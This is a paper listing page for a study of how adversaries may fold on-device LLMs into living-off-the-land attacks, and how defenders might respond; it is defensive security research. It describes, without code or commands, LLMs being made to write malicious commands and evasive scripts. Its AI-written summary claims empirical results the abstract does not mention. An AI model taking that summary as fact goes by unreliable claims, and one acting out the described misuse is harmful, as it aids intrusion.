Living Off the LLM: How LLMs Will Change Adversary Tactics

📅 2025-10-13
📈 Citations: 0
Influential: 0
📄 PDF
🤖 AI Summary
This study reveals that on-device large language models (LLMs) can be weaponized by adversaries within “Living-off-the-Land” (LotL) attack chains, serving as novel semantic-level attack vectors. Current defenses focus predominantly on monitoring suspicious tools while neglecting the semantic behaviors of LLMs—leaving a critical blind spot. Method: We propose and empirically validate that LLMs can autonomously generate malicious commands, author evasion-capable benign-looking scripts, and orchestrate end-to-end penetration tasks—without relying on external malicious binaries. Our approach integrates adversarial machine learning, attack-chain modeling, and threat intelligence analysis to build an end-to-end attack simulation framework, and introduces an intent-aware, semantic-behavior detection paradigm. Results: We demonstrate that LLMs significantly expand the scope and stealth of LotL attacks, enabling high adaptability and persistence. This necessitates a paradigm shift in security defense—from tool-centric monitoring to semantic-behavioral analysis—thereby redefining the boundaries of endpoint threat detection.

Technology Category

Application Category

📝 Abstract
In living off the land attacks, malicious actors use legitimate tools and processes already present on a system to avoid detection. In this paper, we explore how the on-device LLMs of the future will become a security concern as threat actors integrate LLMs into their living off the land attack pipeline and ways the security community may mitigate this threat.
Problem

Research questions and friction points this paper is trying to address.

LLMs may enable adversaries to evade detection using legitimate tools
Threat actors could integrate LLMs into living-off-the-land attacks
Security community must develop mitigation strategies for LLM-based threats
Innovation

Methods, ideas, or system contributions that make the work stand out.

Using LLMs to evade detection systems
Integrating LLMs into existing attack pipelines
Developing mitigation strategies for LLM-enabled attacks
🔎 Similar Papers
No similar papers found.